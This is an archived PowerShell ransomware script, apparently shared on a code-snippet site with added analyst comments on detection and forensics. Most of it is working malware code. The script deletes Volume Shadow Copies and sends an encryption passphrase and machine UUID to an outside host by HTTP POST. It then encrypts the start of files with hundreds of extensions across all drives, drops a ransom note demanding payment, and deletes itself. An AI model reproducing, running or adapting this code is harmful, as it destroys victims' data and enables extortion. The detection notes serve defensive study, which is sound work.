# encoding: ascii
# api: powershell
# title: PS Malware
# description: More malware from http://undoacne(dot)xyz/dl.php
# version: 0.1
# type: function
# author: madtomvane
# license: CC0
# x-poshcode-id: 6089
# x-archived: 2016-05-17T13:25:07
# x-published: 2016-11-13T22:07:00
#
#
# --- Stage 1: remove every Volume Shadow Copy via WMI (Win32_ShadowCopy.Delete)
# so files cannot be restored from VSS snapshots after encryption. Detection:
# WMI / PowerShell script-block logs showing Win32_ShadowCopy enumeration and
# Delete() calls are a high-signal ransomware indicator.
$384862748483 = Get-WmiObject Win32_ShadowCopy
ForEach($82746478282 in $384862748483) {
$82746478282.Delete()
}
# --- Stage 2: 60-character random string drawn from [0-9A-Za-z] (code points
# 48..57, 65..90, 97..122). It is used below as the PBKDF2 passphrase and is
# never written to disk by this script.
$739492774 = ([char[]](Get-Random -Input $(48..57 + 65..90 + 97..122) -Count 60)) -join ""
# Machine UUID (used as the victim identifier in the ransom note) and the
# collection endpoint. Two statements share this physical line in the archive.
$uuid = (get-wmiobject Win32_ComputerSystemProduct).UUID $url = "http://edmontoncitysmart.com/wp-content/plugins/covertcontentwizard/get.php"
# Form-encoded POST body: the passphrase and the UUID.
$parameters = "string=$739492774&uuid=$uuid"
# --- Stage 3: synchronous POST (third open() argument is $false) of the
# passphrase and UUID over plain HTTP using the Msxml2.XMLHTTP COM object.
# Incident-response note: the `string=` value in this request is the only copy
# of the passphrase that leaves the host, so proxy / web-filter logs or a packet
# capture of this POST are what make decryption of affected files possible.
$8374737 = New-Object -ComObject Msxml2.XMLHTTP $8374737.open('POST', $url, $false) $8374737.setRequestHeader("Content-type",
"application/x-www-form-urlencoded")
$8374737.setRequestHeader("Content-length", $post.length) $8374737.setRequestHeader("Connection", "close")
$8374737.send($parameters)
# 150-second pause before the encryption loop starts.
Start-Sleep -Seconds 150
# UTF-16 bytes of the passphrase; this variable is reassigned per file below.
[byte[]]$6458274672=[system.Text.Encoding]::Unicode.GetBytes($739492774)
# Hard-coded PBKDF2 salt.
$19387474823 = [Text.Encoding]::UTF8.GetBytes("WX2LBFPH7Nca6UEXN3MeVxNbHgxncGshdnvTgshjfd")
# --- Stage 4: cipher setup. AES (RijndaelManaged), 32-byte key from
# Rfc2898DeriveBytes(passphrase, salt, 5 iterations), IV = first 16 bytes of
# SHA1("alle"), zero padding, CBC mode. Key and IV are fixed for the whole run,
# so every file is encrypted with the same key/IV pair. Several property
# assignments share one physical line in the archive.
$838472783 = new-Object System.Security.Cryptography.RijndaelManaged
$838472783.Key = (new-Object Security.Cryptography.Rfc2898DeriveBytes $739492774, $19387474823, 5).GetBytes(32) $838472783.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15] $838472783.Padding="Zeros"
$838472783.Mode="CBC"
# --- Stage 5: every PSDrive that reports free space (filesystem drives),
# sorted descending; each drive root is then walked recursively against the
# extension list below (documents, media, archives, source code, disk images,
# databases, game data, ...).
$7382984778=gdr|where {$_.Free}|Sort-Object -Descending
foreach($263772627 in $7382984778){
gci $263772627.root -Recurse -Include "*.pdf","*.xls","*.docx","*.xlsx","*.mp3","*.waw","*.jpg","*.jpeg","*.txt","*.rtf","*.doc","*.rar","*.zip","*.psd","*.tif","*.wma","*.gif","*.bmp","*.ppt","*.pptx","*.docm","*.xlsm","*.pps","*.ppsx","*.ppd","*.eps","*.png","*.ace","*.djvu","*.tar","*.cdr","*.max","*.wmv","*.avi","*.wav","*.mp4","*.pdd","*.php","*.aac","*.ac3","*.amf","*.amr","*.dwg","*.dxf","*.accdb","*.mod","*.tax2013","*.tax2014","*.oga","*.ogg","*.pbf","*.ra","*.raw","*.saf","*.val","*.wave","*.wow","*.wpk","*.3g2","*.3gp","*.3gp2","*.3mm","*.amx","*.avs","*.bik","*.dir","*.divx","*.dvx","*.evo","*.flv","*.qtq","*.tch","*.rts","*.rum","*.rv","*.scn","*.srt","*.stx","*.svi","*.swf","*.trp","*.vdo","*.wm","*.wmd","*.wmmp","*.wmx","*.wvx","*.xvid","*.3d","*.3d4","*.3df8","*.pbs","*.adi","*.ais","*.amu","*.arr","*.bmc","*.bmf","*.cag","*.cam","*.dng","*.ink","*.jif","*.jiff","*.jpc","*.jpf","*.jpw","*.mag","*.mic","*.mip","*.msp","*.nav","*.ncd","*.odc","*.odi","*.opf","*.qif","*.xwd","*.abw","*.act","*.adt","*.aim","*.ans","*.asc","*.ase","*.bdp","*.bdr","*.bib","*.boc","*.crd","*.diz","*.dot","*.dotm","*.dotx","*.dvi","*.dxe","*.mlx","*.err","*.euc","*.faq","*.fdr","*.fds","*.gthr","*.idx","*.kwd","*.lp2","*.ltr","*.man","*.mbox","*.msg","*.nfo","*.now","*.odm","*.oft","*.pwi","*.rng","*.rtx","*.run","*.ssa","*.text","*.unx","*.wbk","*.wsh","*.7z","*.arc","*.ari","*.arj","*.car","*.cbr","*.cbz","*.gz","*.gzig","*.jgz","*.pak","*.pcv","*.puz","*.r00","*.r01","*.r02","*.r03","*.rev","*.sdn","*.sen","*.sfs","*.sfx","*.sh","*.shar","*.shr","*.sqx","*.tbz2","*.tg","*.tlz","*.vsi","*.wad","*.war","*.xpi","*.z02","*.z04","*.zap","*.zipx","*.zoo","*.ipa","*.isu","*.jar","*.js","*.udf","*.adr","*.ap","*.aro","*.asa","*.ascx","*.ashx","*.asmx","*.asp","*.indd","*.asr","*.qbb","*.bml","*.cer","*.cms","*.crt","*.dap","*.htm","*.moz","*.svr","*.url","*.wdgt","*.abk","*.bic","*.big","*.blp","*.bsp","*.cgf","*.chk","*.col","*.cty","*.dem","*.elf","*.ff","*.gam","*.grf","*.h3m
","*.h4r","*.iwd","*.ldb","*.lgp","*.lvl","*.map","*.md3","*.mdl","*.mm6","*.mm7","*.mm8","*.nds","*.pbp","*.ppf","*.pwf","*.pxp","*.sad","*.sav","*.scm","*.scx","*.sdt","*.spr","*.sud","*.uax","*.umx","*.unr","*.uop","*.usa","*.usx","*.ut2","*.ut3","*.utc","*.utx","*.uvx","*.uxx","*.vmf","*.vtf","*.w3g","*.w3x","*.wtd","*.wtf","*.ccd","*.cd","*.cso","*.disk","*.dmg","*.dvd","*.fcd","*.flp","*.img","*.iso","*.isz","*.md0","*.md1","*.md2","*.mdf","*.mds","*.nrg","*.nri","*.vcd","*.vhd","*.snp","*.bkf","*.ade","*.adpb","*.dic","*.cch","*.ctt","*.dal","*.ddc","*.ddcx","*.dex","*.dif","*.dii","*.itdb","*.itl","*.kmz","*.lcd","*.lcf","*.mbx","*.mdn","*.odf","*.odp","*.ods","*.pab","*.pkb","*.pkh","*.pot","*.potx","*.pptm","*.psa","*.qdf","*.qel","*.rgn","*.rrt","*.rsw","*.rte","*.sdb","*.sdc","*.sds","*.sql","*.stt","*.t01","*.t03","*.t05","*.tcx","*.thmx","*.txd","*.txf","*.upoi","*.vmt","*.wks","*.wmdb","*.xl","*.xlc","*.xlr","*.xlsb","*.xltx","*.ltm","*.xlwx","*.mcd","*.cap","*.cc","*.cod","*.cp","*.cpp","*.cs","*.csi","*.dcp","*.dcu","*.dev","*.dob","*.dox","*.dpk","*.dpl","*.dpr","*.dsk","*.dsp","*.eql","*.ex","*.f90","*.fla","*.for","*.fpp","*.jav","*.java","*.lbi","*.owl","*.pl","*.plc","*.pli","*.pm","*.res","*.rsrc","*.so","*.swd","*.tpu","*.tpx","*.tu","*.tur","*.vc","*.yab","*.8ba","*.8bc","*.8be","*.8bf","*.8bi8","*.bi8","*.8bl","*.8bs","*.8bx","*.8by","*.8li","*.aip","*.amxx","*.ape","*.api","*.mxp","*.oxt","*.qpx","*.qtr","*.xla","*.xlam","*.xll","*.xlv","*.xpt","*.cfg","*.cwf","*.dbb","*.slt","*.bp2","*.bp3","*.bpl","*.clr","*.dbx","*.jc","*.potm","*.ppsm","*.prc","*.prt","*.shw","*.std","*.ver","*.wpl","*.xlm","*.yps","*.md3","*.1cd"|%{
# Per-file work. Any error here (locked file, access denied, overlong path)
# is discarded by the empty catch below, so the loop never stops.
try{
# Open the file read/write and read at most its first 44888 bytes
# (the whole file when it is shorter than that).
$7294877238 = New-Object System.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
if ($7294877238.BaseStream.Length -lt 44888){
$7857348728 = $7294877238.BaseStream.Length
}
else
{
$7857348728 = 44888
}
$6458274672 = $7294877238.ReadBytes($7857348728)
$7294877238.Close()
# Encrypt that prefix in memory with the cipher configured above.
$548297563785 = $838472783.CreateEncryptor()
$47373823837537 = new-Object IO.MemoryStream
$658273648734 = new-Object Security.Cryptography.CryptoStream $47373823837537,$548297563785,"Write"
$658273648734.Write($6458274672, 0,$6458274672.Length)
$658273648734.Close()
$47373823837537.Close()
$548297563785.Clear()
$83865637482 = $47373823837537.ToArray()
# Overwrite the start of the file with the ciphertext (FileMode Open, no
# truncation): only the leading bytes are replaced and the remainder of the
# file is left untouched. Zero padding rounds the ciphertext up to a 16-byte
# multiple, so the write can extend slightly past the bytes that were read.
# Forensic note: the file keeps its name and extension, so encrypted files are
# recognisable only by content, not by a renamed extension.
$538853723428 = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
$538853723428.Write($83865637482,0,$83865637482.Length)
$538853723428.Close()
# Drop DECRYPT_INSTRUCTION.html once per directory (skipped if it already
# exists): a base64-decoded note body (removed from this archived copy),
# then the UUID, a key-deletion date 30 days out and a price-increase date
# 10 days out, both computed from the current date.
$57273472723473 = $_.Directory.ToString() + '\DECRYPT_INSTRUCTION.html'
$977364738569878 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("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"));
if(!(Test-path($57273472723473))){
New-Item -Path $57273472723473 -ItemType file -Value $977364738569878
Add-Content -Path $57273472723473 -Value ("<p><h2>Your #UUID is $uuid</p></h2>")
Add-Content -Path $57273472723473 -Value ('<p><h2>Guaranteed recovery is provided before scheduled deletion of private key on the day of '+(Get-Date).AddDays(+30))
Add-Content -Path $57273472723473 -Value ('<p><h2>The price to obtain the decrypter goes from 500 $ to 1000 $ on the day of '+(Get-Date).AddDays(+10))
}}
# All per-file errors are silently dropped; nothing is logged.
catch
{
}
}}
# Self-deletion: resolves the running script's own path from the caller's
# $MyInvocation (scope 1), echoes it, and removes the script file so the
# on-disk artifact is gone after the run. The DECRYPT_INSTRUCTION.html drops
# and any PowerShell script-block / transcription logs remain as evidence.
function Delete() {
$Invocation = (Get-Variable MyInvocation -Scope 1).Value
# Path of the script that invoked this function.
$Path = $Invocation.MyCommand.Path
# Echo the path, then delete the script file itself.
Write-Host $Path
Remove-Item $Path
}
# call function
# Runs the self-delete as the final action. The characters after `Delete`
# look like encoding residue in the archived copy rather than an intended
# argument (the function declares no parameters) -- not confirmed.
Delete 㐲㐰